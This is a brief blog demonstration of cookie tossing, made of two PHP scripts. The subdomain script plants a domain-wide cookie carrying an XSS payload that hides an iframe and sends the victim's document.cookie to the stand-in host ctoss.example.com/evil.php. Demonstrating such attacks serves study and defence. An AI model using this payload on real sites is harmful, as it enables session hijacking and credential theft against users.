Cookie Tossing Example 06/20/2017 Uncategorized A simple demonstration of cookie tossing. Parent Domain1234567891011121314<?phpif(isset($_COOKIE['cookie1'])){ echo "Cookie1: ".$_COOKIE['cookie1']."<br/>";}if(isset($_COOKIE['cookie2'])){ echo "Cookie2: ".$_COOKIE['cookie2']."<br/>";}if(isset($_COOKIE['cookie_secret'])){ echo "Cookie secret: ".$_COOKIE['cookie_secret']."<br/>";}setcookie("cookie1",'OriginalCookie1',time()+3600*24,"/","example.com");setcookie("cookie2",'OriginalCookie2',time()+3600*24);setcookie("cookie_secret",'This is the password',time()+3600*24,"/","www.example.com");?> Subdomain12345678910111213141516<?phpif(isset($_COOKIE['cookie1'])){ echo "Cookie1: ".urlencode($_COOKIE['cookie1'])."<br/>";}if(isset($_COOKIE['cookie2'])){ echo "Cookie2: ".urlencode($_COOKIE['cookie2'])."<br/>";}if(isset($_COOKIE['cookie_secret'])){ echo "Cookie_secret: ".urlencode($_COOKIE['cookie_secret'])."<br/>";}else{ echo "No secret cookie found.<br/>";}$xss="Evil_Cookie<script>document.write(\"<iframe src='http://ctoss.example.com/evil.php?cookie=\"+escape(document.cookie)+\"' style='display:none'></iframe>\");</script>";setcookie("cookie2",$xss,time()+600,"/","example.com");?><script>document.cookie = "cookie1=changedbyJavaScript; Path=/; Domain=.example.com"</script> Next Deploy Java Web Maven Project on Remote Tomcat Server